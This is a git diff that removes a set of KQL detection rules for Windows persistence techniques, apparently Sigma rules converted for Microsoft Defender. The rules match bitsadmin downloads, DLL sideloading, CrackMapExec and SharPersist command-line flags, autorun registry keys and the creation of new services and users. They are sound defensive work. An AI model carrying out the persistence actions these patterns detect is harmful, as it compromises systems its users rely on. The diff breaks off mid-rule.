index 30f379f3..00000000
--- a/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: NVISO
-// Date: 2020/05/04
-// Level: high
-// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\"))
\ No newline at end of file
diff --git a/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql b/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql
deleted file mode 100644
index 46977716..00000000
--- a/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Varganov, Florian Roth (Nextron Systems)
-// Date: 2022/08/24
-// Level: high
-// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
-// Tags: attack.persistence, attack.t1547.001, cve.2022.30190
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\msdt.exe" and (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Start Menu\\Programs\\Startup\\" or FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\ProgramData\\" or FolderPath contains "C:\\Users\\Public\\")
\ No newline at end of file
diff --git a/Persistence/File_Download_Via_Bitsadmin.kql b/Persistence/File_Download_Via_Bitsadmin.kql
deleted file mode 100644
index e877ea4a..00000000
--- a/Persistence/File_Download_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, FPT.EagleEye
-// Date: 2017/03/09
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http"))
\ No newline at end of file
diff --git a/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql b/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql
deleted file mode 100644
index c7fb9c33..00000000
--- a/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql b/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql
deleted file mode 100644
index 7c74c2ea..00000000
--- a/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file to uncommon target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql b/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql
deleted file mode 100644
index 03b37b13..00000000
--- a/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file with a suspicious extension
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Persistence/HackTool_-_CrackMapExec_Execution.kql b/Persistence/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Persistence/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Persistence/HackTool_-_SharPersist_Execution.kql b/Persistence/HackTool_-_SharPersist_Execution.kql
deleted file mode 100644
index 75962c94..00000000
--- a/Persistence/HackTool_-_SharPersist_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/15
-// Level: high
-// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
-// Tags: attack.persistence, attack.t1053
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -t schtask -c " or ProcessCommandLine contains " -t startupfolder -c ") or (ProcessCommandLine contains " -t reg -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t service -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t schtask -c " and ProcessCommandLine contains " -m add") or (FolderPath endswith "\\SharPersist.exe" or ProcessVersionInfoProductName =~ "SharPersist")
\ No newline at end of file
diff --git a/Persistence/IE_Change_Domain_Zone.kql b/Persistence/IE_Change_Domain_Zone.kql
deleted file mode 100644
index b4770567..00000000
--- a/Persistence/IE_Change_Domain_Zone.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: medium
-// Description: Hides the file extension through modification of the registry
-// Tags: attack.persistence, attack.t1137
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains" and (not((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "(Empty)"))))
\ No newline at end of file
diff --git a/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql b/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql
deleted file mode 100644
index 0213abe5..00000000
--- a/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/12/11
-// Level: medium
-// Description: Detects suspicious IIS native-code module installations via command line
-// Tags: attack.persistence, attack.t1505.003
-DeviceProcessEvents
-| where (((ProcessCommandLine contains "install" and ProcessCommandLine contains "module") and (ProcessCommandLine contains "-name:" or ProcessCommandLine contains "/name:")) and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\iissetup.exe"))
\ No newline at end of file
diff --git a/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql b/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql
deleted file mode 100644
index 5016e92a..00000000
--- a/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Internet Explorer" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer") and (RegistryKey contains "\\Toolbar" or RegistryKey contains "\\Extensions" or RegistryKey contains "\\Explorer Bars") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}" or RegistryKey contains "\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" or RegistryKey contains "\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}" or RegistryKey contains "\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}") or (RegistryKey endswith "\\Toolbar\\ShellBrowser\\ITBar7Layout" or RegistryKey endswith "\\Toolbar\\ShowDiscussionButton" or RegistryKey endswith "\\Toolbar\\Locked"))))
\ No newline at end of file
diff --git a/Persistence/Leviathan_Registry_Key_Activity.kql b/Persistence/Leviathan_Registry_Key_Activity.kql
deleted file mode 100644
index 2ebd1443..00000000
--- a/Persistence/Leviathan_Registry_Key_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Aidan Bracher
-// Date: 2020/07/07
-// Level: critical
-// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd"
\ No newline at end of file
diff --git a/Persistence/MSExchange_Transport_Agent_Installation.kql b/Persistence/MSExchange_Transport_Agent_Installation.kql
deleted file mode 100644
index 734a09ec..00000000
--- a/Persistence/MSExchange_Transport_Agent_Installation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/08
-// Level: medium
-// Description: Detects the Installation of a Exchange Transport Agent
-// Tags: attack.persistence, attack.t1505.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "Install-TransportAgent"
\ No newline at end of file
diff --git a/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
deleted file mode 100644
index a55dc381..00000000
--- a/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/08/12
-// Level: high
-// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
-Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/Persistence/Microsoft_Office_DLL_Sideload.kql b/Persistence/Microsoft_Office_DLL_Sideload.kql
deleted file mode 100644
index 7003f77d..00000000
--- a/Persistence/Microsoft_Office_DLL_Sideload.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: high
-// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/Persistence/Modify_User_Shell_Folders_Startup_Value.kql b/Persistence/Modify_User_Shell_Folders_Startup_Value.kql
deleted file mode 100644
index 7fba55a2..00000000
--- a/Persistence/Modify_User_Shell_Folders_Startup_Value.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: high
-// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup"
\ No newline at end of file
diff --git a/Persistence/Narrator_s_Feedback-Hub_Persistence.kql b/Persistence/Narrator_s_Feedback-Hub_Persistence.kql
deleted file mode 100644
index 249e40b4..00000000
--- a/Persistence/Narrator_s_Feedback-Hub_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Dmitriy Lifanov, oscd.community
-// Date: 2019/10/25
-// Level: high
-// Description: Detects abusing Windows 10 Narrator's Feedback-Hub
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (ActionType =~ "DeleteValue" and RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute") or RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)"
\ No newline at end of file
diff --git a/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql b/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql
deleted file mode 100644
index 5b941e28..00000000
--- a/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/06/25
-// Level: high
-// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
-// Tags: attack.persistence, attack.t1546.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "ActiveScriptEventConsumer" and ProcessCommandLine contains " CREATE "
\ No newline at end of file
diff --git a/Persistence/New_Custom_Shim_Database_Created.kql b/Persistence/New_Custom_Shim_Database_Created.kql
deleted file mode 100644
index 5ffd2880..00000000
--- a/Persistence/New_Custom_Shim_Database_Created.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/29
-// Level: medium
-// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
-The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
-
-// Tags: attack.persistence, attack.t1547.009
-DeviceFileEvents
-| where FolderPath contains ":\\Windows\\apppatch\\Custom\\" or FolderPath contains ":\\Windows\\apppatch\\CustomSDB\\"
\ No newline at end of file
diff --git a/Persistence/New_Kernel_Driver_Via_SC.EXE.kql b/Persistence/New_Kernel_Driver_Via_SC.EXE.kql
deleted file mode 100644
index 1dbdb0cb..00000000
--- a/Persistence/New_Kernel_Driver_Via_SC.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/14
-// Level: medium
-// Description: Detects creation of a new service (kernel driver) with the type "kernel"
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql b/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql
deleted file mode 100644
index 30e9ae74..00000000
--- a/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/11/28
-// Level: high
-// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
-
-// Tags: attack.persistence, attack.t1546.007
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh" and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/Persistence/New_ODBC_Driver_Registered.kql b/Persistence/New_ODBC_Driver_Registered.kql
deleted file mode 100644
index 08b8669c..00000000
--- a/Persistence/New_ODBC_Driver_Registered.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/23
-// Level: low
-// Description: Detects the registration of a new ODBC driver.
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\ODBC\\ODBCINST.INI" and RegistryKey endswith "\\Driver") and (not((RegistryValueData =~ "%WINDIR%\\System32\\SQLSRV32.dll" and RegistryKey contains "\\SQL Server"))) and (not(((RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Access ") or (RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Excel Driver"))))
\ No newline at end of file
diff --git a/Persistence/New_Outlook_Macro_Created.kql b/Persistence/New_Outlook_Macro_Created.kql
deleted file mode 100644
index d9d853ed..00000000
--- a/Persistence/New_Outlook_Macro_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @ScoubiMtl
-// Date: 2021/04/05
-// Level: medium
-// Description: Detects the creation of a macro file for Outlook.
-// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\outlook.exe" and FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM"
\ No newline at end of file
diff --git a/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql b/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql
deleted file mode 100644
index d2608baa..00000000
--- a/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
-// Date: 2018/08/25
-// Level: high
-// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (((RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Desktop\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "%temp%\\" or RegistryValueData contains "%tmp%\\") or (RegistryValueData startswith "%Public%\\" or RegistryValueData startswith "wscript" or RegistryValueData startswith "cscript")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce")) and (not(((RegistryValueData contains "rundll32.exe C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32" and RegistryValueData contains "C:\\Windows\\Temp\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\Download\\")))
\ No newline at end of file
diff --git a/Persistence/New_Service_Creation_Using_PowerShell.kql b/Persistence/New_Service_Creation_Using_PowerShell.kql
deleted file mode 100644
index ce9fb3fa..00000000
--- a/Persistence/New_Service_Creation_Using_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023/02/20
-// Level: low
-// Description: Detects the creation of a new service using powershell.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName"
\ No newline at end of file
diff --git a/Persistence/New_Service_Creation_Using_Sc.EXE.kql b/Persistence/New_Service_Creation_Using_Sc.EXE.kql
deleted file mode 100644
index dd56c1e4..00000000
--- a/Persistence/New_Service_Creation_Using_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023/02/20
-// Level: low
-// Description: Detects the creation of a new service using the "sc.exe" utility.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql b/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql
deleted file mode 100644
index ef12160b..00000000
--- a/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/06/19
-// Level: high
-// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
-Adversaries may abuse time providers to execute DLLs when the system boots.
-The Windows Time service (W32Time) enables time synchronization across and within domains.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.003
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL"))))
\ No newline at end of file
diff --git a/Persistence/New_User_Created_Via_Net.EXE.kql b/Persistence/New_User_Created_Via_Net.EXE.kql
deleted file mode 100644
index a83f4599..00000000
--- a/Persistence/New_User_Created_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community)
-// Date: 2018/10/30
-// Level: medium
-// Description: Identifies the creation of local users via the net.exe command.
-// Tags: attack.persistence, attack.t1136.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql b/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql
deleted file mode 100644
index 7e3622ff..00000000
--- a/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/12
-// Level: high
-// Description: Detects creation of local users via the net.exe command with the option "never expire"
-// Tags: attack.persistence, attack.t1136.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "expires:never") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Persistence/Office_Application_Startup_-_Office_Test.kql b/Persistence/Office_Application_Startup_-_Office_Test.kql
deleted file mode 100644
index 83afa561..00000000
--- a/Persistence/Office_Application_Startup_-_Office_Test.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: omkar72
-// Date: 2020/10/25
-// Level: medium
-// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started
-// Tags: attack.persistence, attack.t1137.002
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\Office test\\Special\\Perf"
\ No newline at end of file
diff --git a/Persistence/Office_Autorun_Keys_Modification.kql b/Persistence/Office_Autorun_Keys_Modification.kql
deleted file mode 100644
index a9ff5181..00000000
--- a/Persistence/Office_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Office" or RegistryKey contains "\\Software\\Microsoft\\Office") and (RegistryKey contains "\\Word\\Addins" or RegistryKey contains "\\PowerPoint\\Addins" or RegistryKey contains "\\Outlook\\Addins" or RegistryKey contains "\\Onenote\\Addins" or RegistryKey contains "\\Excel\\Addins" or RegistryKey contains "\\Access\\Addins" or RegistryKey contains "test\\Special\\Perf") and (not(((InitiatingProcessFolderPath =~ "C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe" and RegistryKey contains "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt") or RegistryValueData =~ "(Empty)" or ((InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\regsvr32.exe") and (RegistryKey contains "\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1" or RegistryKey contains "\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect" or RegistryKey contains 